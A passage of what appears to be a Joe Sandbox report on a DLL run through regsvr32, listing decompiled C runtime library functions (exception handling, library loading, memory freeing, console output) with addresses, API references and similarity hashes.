							_t91 =  *((intOrPtr*)(_t94 + _t75 * 4));
							_t76 = _t94 + _t75 * 4;
							_t95 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t96 = _v5;
								goto L7;
							} else {
								_t107 = _t113;
								_t77 = E6F6CBD90(_t95, _t113);
								_t96 = 1;
								_v5 = 1;
								_t123 = _t77;
								if(_t123 < 0) {
									_v16 = 0;
									L13:
									_push(_t113);
									E6F6CA990(_t91, _t107, _t112, _t113, _v12);
									goto L14;
								} else {
									if(_t123 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x6f6d5474;
											if(__eflags != 0) {
												_t87 = E6F6D44D0(__eflags, 0x6f6d5474);
												_t117 = _t117 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t115 =  *0x6f6d5474; // 0x6f6cab2e
													 *0x6f6d51b8(_a4, 1);
													 *_t115();
													_t113 = _v20;
													_t117 = _t117 + 8;
												}
												_t78 = _a4;
											}
										}
										_t108 = _t78;
										E6F6CBDD0(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t112;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t112) {
											_t108 = _t112;
											E6F6CBDF0(_t80, _t112, _t113, 0x6f6dc024);
											_t80 = _a8;
										}
										_push(_t113);
										 *((intOrPtr*)(_t80 + 0xc)) = _t91;
										E6F6CA990(_t91, _t108, _t112, _t113, _v12);
										E6F6CBDB0();
										asm("int3");
										_push(8);
										_push(0x6f6da6a8);
										E6F6C9960(_t91, _t112, _t113);
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L29:
														_t102 =  *(_t83 + 0x1c);
														__eflags = _t102;
														if(_t102 != 0) {
															_t110 =  *(_t102 + 4);
															__eflags = _t110;
															if(_t110 == 0) {
																__eflags =  *_t102 & 0x00000010;
																if(( *_t102 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t103 =  *_t83;
																	__eflags = _t103;
																	if(_t103 != 0) {
																		 *0x6f6d51b8(_t103);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E6F6CABCF( *(_t83 + 0x18), _t110);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L29;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L29;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L37;
							L7:
							_t112 = _t91;
						} while (_t91 != 0xfffffffe);
						if(_t96 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L37:
			}

0x6f6ca9d0
0x6f6ca9d7
0x6f6ca9dc
0x6f6ca9e2
0x6f6ca9ee
0x6f6ca9f0
0x6f6ca9f6
0x6f6ca9f6
0x6f6ca9ff
0x6f6caa01
0x6f6caa04
0x6f6caa07
0x6f6caa0f
0x6f6caa14
0x6f6caa17
0x6f6caa1a
0x6f6caa21
0x6f6caa7d
0x6f6caa80
0x6f6caa88
0x6f6caa8f
0x00000000
0x6f6caa8f
0x00000000
0x6f6caa23
0x6f6caa23
0x6f6caa29
0x6f6caa2f
0x6f6caa35
0x6f6caaa0
0x6f6caaa9
0x6f6caa37
0x6f6caa37
0x6f6caa37
0x6f6caa3d
0x6f6caa40
0x6f6caa43
0x6f6caa46
0x6f6caa49
0x6f6caa4e
0x6f6caa64
0x00000000
0x6f6caa50
0x6f6caa50
0x6f6caa52
0x6f6caa57
0x6f6caa59
0x6f6caa5c
0x6f6caa5e
0x6f6caa74
0x6f6caa94
0x6f6caa94
0x6f6caa98
0x00000000
0x6f6caa60
0x6f6caa60
0x6f6caaaa
0x6f6caaad
0x6f6caab3
0x6f6caab5
0x6f6caabc
0x6f6caac3
0x6f6caac8
0x6f6caacb
0x6f6caacd
0x6f6caacf
0x6f6caadc
0x6f6caae2
0x6f6caae4
0x6f6caae7
0x6f6caae7
0x6f6caaea
0x6f6caaea
0x6f6caabc
0x6f6caaf0
0x6f6caaf2
0x6f6caaf7
0x6f6caafa
0x6f6caafd
0x6f6cab05
0x6f6cab09
0x6f6cab0e
0x6f6cab0e
0x6f6cab11
0x6f6cab15
0x6f6cab18
0x6f6cab28
0x6f6cab2d
0x6f6cab2e
0x6f6cab30
0x6f6cab35
0x6f6cab3a
0x6f6cab3d
0x6f6cab3f
0x6f6cab41
0x6f6cab47
0x6f6cab49
0x6f6cab4d
0x6f6cab4f
0x6f6cab56
0x6f6cab6a
0x6f6cab6a
0x6f6cab6d
0x6f6cab6f
0x6f6cab71
0x6f6cab74
0x6f6cab76
0x6f6caba1
0x6f6caba4
0x6f6caba6
0x6f6caba9
0x6f6cabab
0x6f6cabad
0x6f6cabb7
0x6f6cabbd
0x6f6cabbd
0x6f6cabad
0x6f6cab78
0x6f6cab78
0x6f6cab78
0x6f6cab78
0x6f6cab80
0x6f6cab85
0x6f6cab85
0x6f6cab76
0x6f6cab58
0x6f6cab58
0x6f6cab5f
0x00000000
0x6f6cab61
0x6f6cab61
0x6f6cab68
0x00000000
0x00000000
0x6f6cab68
0x6f6cab5f
0x6f6cab56
0x6f6cab4d
0x6f6cab47
0x6f6cabc2
0x6f6cabce
0x6f6caa62
0x00000000
0x6f6caa62
0x6f6caa60
0x6f6caa5e
0x00000000
0x6f6caa67
0x6f6caa67
0x6f6caa69
0x6f6caa70
0x00000000
0x6f6caa72
0x00000000
0x6f6caa70
0x6f6caa35
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6F6CAA07
___except_validate_context_record.LIBVCRUNTIME ref: 6F6CAA0F
_ValidateLocalCookies.LIBCMT ref: 6F6CAA98
__IsNonwritableInCurrentImage.LIBCMT ref: 6F6CAAC3
_ValidateLocalCookies.LIBCMT ref: 6F6CAB18

Strings

csm, xrefs: 6F6CAAAD

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d7d57fab4fba9595f351ce7187730df2b4ae692fdec903895bf795783ba07d08
Instruction ID: d1abfff8b4200b8caf3566613bf981261b35f6f802803242f49f520d8309bf9b
Opcode Fuzzy Hash: d7d57fab4fba9595f351ce7187730df2b4ae692fdec903895bf795783ba07d08
Instruction Fuzzy Hash: 93416634A00209AFCF00CFA9C954A9EBBF5EF45328F108155E8559B391D735EA56CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CDCF3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F6CDCF3(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6f6dd560 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6f6d6200 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6F6CD618(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6F6CD618(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6f6cdcfc
0x6f6cdda6
0x6f6cdd04
0x6f6cdd06
0x6f6cdd0d
0x6f6cdd0f
0x6f6cdd15
0x6f6cdd22
0x6f6cdd37
0x6f6cdd3b
0x6f6cdd8d
0x6f6cdd8d
0x6f6cdd92
0x6f6cdd96
0x6f6cdd99
0x6f6cdd99
0x6f6cdd9f
0x6f6cdda1
0x6f6cddb6
0x6f6cddb1
0x6f6cddb5
0x6f6cddb5
0x6f6cdda3
0x6f6cdda3
0x00000000
0x6f6cdda3
0x6f6cdd3d
0x6f6cdd46
0x6f6cdd7d
0x6f6cdd7d
0x6f6cdd7f
0x6f6cdd81
0x00000000
0x00000000
0x6f6cdd89
0x00000000
0x6f6cdd89
0x6f6cdd50
0x6f6cdd55
0x6f6cdd5a
0x00000000
0x00000000
0x6f6cdd64
0x6f6cdd69
0x6f6cdd6e
0x00000000
0x00000000
0x6f6cdd73
0x6f6cdd79
0x00000000
0x6f6cdd79
0x6f6cdd1a
0x00000000
0x00000000
0x00000000
0x6f6cdd20
0x6f6cddaf
0x00000000

Strings

ext-ms-, xrefs: 6F6CDD5E
api-ms-, xrefs: 6F6CDD4A

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 8d4962a5c1414384c949df981058c4428b732ccd7f0157cab93fede58e6f4779
Instruction ID: 192b9ddd0e2619905a6331b5dcfa07b4375b3384eeb8c78d889f1a4cf7aeed30
Opcode Fuzzy Hash: 8d4962a5c1414384c949df981058c4428b732ccd7f0157cab93fede58e6f4779
Instruction Fuzzy Hash: A8219071EC5625BBDB119A798C44B8A37AADF42760F110351E8B5AB280DA30FD00C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6F6D19AC Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F6D19AC(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6F6D1974(_t45, 7);
					E6F6D1974(_t45 + 0x1c, 7);
					E6F6D1974(_t45 + 0x38, 0xc);
					E6F6D1974(_t45 + 0x68, 0xc);
					E6F6D1974(_t45 + 0x98, 2);
					E6F6CDC0E( *((intOrPtr*)(_t45 + 0xa0)));
					E6F6CDC0E( *((intOrPtr*)(_t45 + 0xa4)));
					E6F6CDC0E( *((intOrPtr*)(_t45 + 0xa8)));
					E6F6D1974(_t45 + 0xb4, 7);
					E6F6D1974(_t45 + 0xd0, 7);
					E6F6D1974(_t45 + 0xec, 0xc);
					E6F6D1974(_t45 + 0x11c, 0xc);
					E6F6D1974(_t45 + 0x14c, 2);
					E6F6CDC0E( *((intOrPtr*)(_t45 + 0x154)));
					E6F6CDC0E( *((intOrPtr*)(_t45 + 0x158)));
					E6F6CDC0E( *((intOrPtr*)(_t45 + 0x15c)));
					return E6F6CDC0E( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6f6d19b2
0x6f6d19b7
0x6f6d19c0
0x6f6d19cb
0x6f6d19d6
0x6f6d19e1
0x6f6d19ef
0x6f6d19fa
0x6f6d1a05
0x6f6d1a10
0x6f6d1a1e
0x6f6d1a2c
0x6f6d1a3d
0x6f6d1a4b
0x6f6d1a59
0x6f6d1a64
0x6f6d1a6f
0x6f6d1a7a
0x00000000
0x6f6d1a8a
0x6f6d1a8f

APIs

Part of subcall function 6F6D1974: _free.LIBCMT ref: 6F6D1999

_free.LIBCMT ref: 6F6D19FA

Part of subcall function 6F6CDC0E: HeapFree.KERNEL32(00000000,00000000,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?), ref: 6F6CDC24
Part of subcall function 6F6CDC0E: GetLastError.KERNEL32(?,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?,?), ref: 6F6CDC36

_free.LIBCMT ref: 6F6D1A05
_free.LIBCMT ref: 6F6D1A10
_free.LIBCMT ref: 6F6D1A64
_free.LIBCMT ref: 6F6D1A6F
_free.LIBCMT ref: 6F6D1A7A
_free.LIBCMT ref: 6F6D1A85

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b47540912a6668359d280ce4611d6576ad98f292eac8908dfa6c864ce8d72109
Instruction ID: 5380a617726ace994357fd39bf7fe274a50dc61606f19a2f960f12275eec1aae
Opcode Fuzzy Hash: b47540912a6668359d280ce4611d6576ad98f292eac8908dfa6c864ce8d72109
Instruction Fuzzy Hash: 2D112171980B48BAE620ABB0CD05FDB77AD9F0470CF404916B2A9AB0D3DBA5F505C795

Uniqueness

Uniqueness Score: -1.00%

Function 6F6D0921 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E6F6D0921(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x6f6dc024; // 0x15485920
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6f6dd638 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E6F6CC407( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6f6dd638 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x6f6dc760; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6f6dd638 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E6F6D169D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6f6dc760)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x6f6dd638 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E6F6C9DB0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x6f6dd638 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6F6D169D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E6F6CFCA5(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E6F6D02C6(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x6f6dd638 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x6f6dd638 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6f6dd638 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E6F6CE7D9( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E6F6CE7D9();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6F6C9ADF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x6f6d092c
0x6f6d0933
0x6f6d0936
0x6f6d093e
0x6f6d0941
0x6f6d094e
0x6f6d0951
0x6f6d0954
0x6f6d095b
0x6f6d0963
0x6f6d0966
0x6f6d0969
0x6f6d096f
0x6f6d0971
0x6f6d0978
0x6f6d0982
0x6f6d0984
0x6f6d0987
0x6f6d098a
0x6f6d098d
0x6f6d0990
0x6f6d0993
0x6f6d0999
0x6f6d0ca4
0x6f6d0ca4
0x00000000
0x6f6d099f
0x6f6d09a7
0x6f6d09aa
0x6f6d09b0
0x6f6d09b3
0x6f6d09ba
0x6f6d09c1
0x6f6d09c4
0x00000000
0x00000000
0x6f6d09cd
0x6f6d09d2
0x6f6d09d4
0x6f6d09d7
0x6f6d09dc
0x6f6d09e0
0x00000000
0x00000000
0x00000000
0x6f6d09e0
0x6f6d09e5
0x6f6d09e7
0x6f6d09ec
0x6f6d0aa6
0x6f6d0aad
0x6f6d0aae
0x6f6d0ab1
0x6f6d0ab3
0x6f6d0c57
0x6f6d0c59
0x00000000
0x6f6d0c5b
0x6f6d0c5b
0x6f6d0c5e
0x6f6d0c6d
0x6f6d0c71
0x6f6d0c72
0x6f6d0c72
0x00000000
0x6f6d0c76
0x6f6d0ab9
0x6f6d0abb
0x6f6d0ac1
0x6f6d0ac4
0x6f6d0ad0
0x6f6d0ad9
0x6f6d0ae4
0x6f6d0ae9
0x6f6d0aec
0x6f6d0aef
0x00000000
0x6f6d0af5
0x6f6d0af5
0x00000000
0x6f6d0af5
0x6f6d0aef
0x6f6d09f2
0x6f6d0a01
0x6f6d0a02
0x6f6d0a05
0x6f6d0a08
0x6f6d0a0d
0x6f6d0c23
0x6f6d0c25
0x6f6d0c27
0x6f6d0c29
0x6f6d0c33
0x6f6d0c3b
0x6f6d0c3d
0x6f6d0c3e
0x6f6d0c42
0x6f6d0c45
0x6f6d0c45
0x6f6d0c49
0x6f6d0c49
0x6f6d0c49
0x6f6d0c4c
0x6f6d0c4c
0x6f6d0c4c
0x6f6d0c4e
0x6f6d0c4e
0x6f6d0c52
0x6f6d0a13
0x6f6d0a13
0x6f6d0a16
0x6f6d0a18
0x6f6d0a1b
0x6f6d0a1e
0x6f6d0a22
0x6f6d0a23
0x6f6d0a27
0x6f6d0a2a
0x6f6d0a2f
0x6f6d0a39
0x6f6d0a3e
0x6f6d0a41
0x6f6d0a44
0x6f6d0a44
0x6f6d0a47
0x6f6d0a4a
0x6f6d0a4c
0x6f6d0a55
0x6f6d0a59
0x6f6d0a5a
0x6f6d0a5e
0x6f6d0a64
0x6f6d0a6d
0x6f6d0a7a
0x6f6d0a81
0x6f6d0a85
0x6f6d0a90
0x6f6d0a95
0x6f6d0a9b
0x00000000
0x6f6d0aa1
0x6f6d0af8
0x6f6d0af9
0x6f6d0b7c
0x6f6d0b83
0x6f6d0b8b
0x6f6d0b93
0x6f6d0b98
0x6f6d0b9b
0x6f6d0ba0
0x00000000
0x6f6d0ba6
0x6f6d0bbb
0x6f6d0c9b
0x6f6d0ca1
0x00000000
0x6f6d0bc1
0x6f6d0bca
0x6f6d0bcc
0x6f6d0bd2
0x00000000
0x6f6d0bd8
0x6f6d0bdc
0x6f6d0c12
0x6f6d0c15
0x00000000
0x6f6d0c1b
0x6f6d0c1b
0x00000000
0x6f6d0c1b
0x6f6d0bde
0x6f6d0be0
0x6f6d0be2
0x6f6d0bfb
0x00000000
0x6f6d0c01
0x6f6d0c05
0x00000000
0x6f6d0c0b
0x6f6d0c0b
0x6f6d0c0e
0x6f6d0c0f
0x00000000
0x6f6d0c0f
0x6f6d0c05
0x6f6d0bfb
0x6f6d0bdc
0x6f6d0bd2
0x6f6d0bbb
0x6f6d0ba0
0x6f6d0a9b
0x6f6d0a0d
0x00000000
0x6f6d0afd
0x6f6d0afd
0x6f6d0b01
0x6f6d0b04
0x6f6d0b26
0x6f6d0b29
0x6f6d0b2e
0x6f6d0b32
0x6f6d0b36
0x6f6d0b64
0x6f6d0b66
0x00000000
0x6f6d0b38
0x6f6d0b38
0x6f6d0b38
0x6f6d0b3b
0x6f6d0b3e
0x6f6d0b41
0x6f6d0c78
0x6f6d0c7b
0x6f6d0c7e
0x6f6d0c88
0x6f6d0c93
0x6f6d0c98
0x00000000
0x6f6d0b47
0x6f6d0b4e
0x6f6d0b53
0x6f6d0b56
0x6f6d0b59
0x00000000
0x6f6d0b5f
0x6f6d0b5f
0x00000000
0x6f6d0b5f
0x6f6d0b59
0x6f6d0b41
0x6f6d0b06
0x6f6d0b0a
0x6f6d0b0d
0x6f6d0b12
0x6f6d0b18
0x6f6d0b1a
0x6f6d0b21
0x6f6d0b67
0x6f6d0b6a
0x6f6d0b6b
0x6f6d0b70
0x6f6d0b73
0x6f6d0b76
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6d0b76
0x00000000
0x6f6d0b04
0x6f6d099f
0x6f6d0ca7
0x6f6d0ca7
0x6f6d0ca9
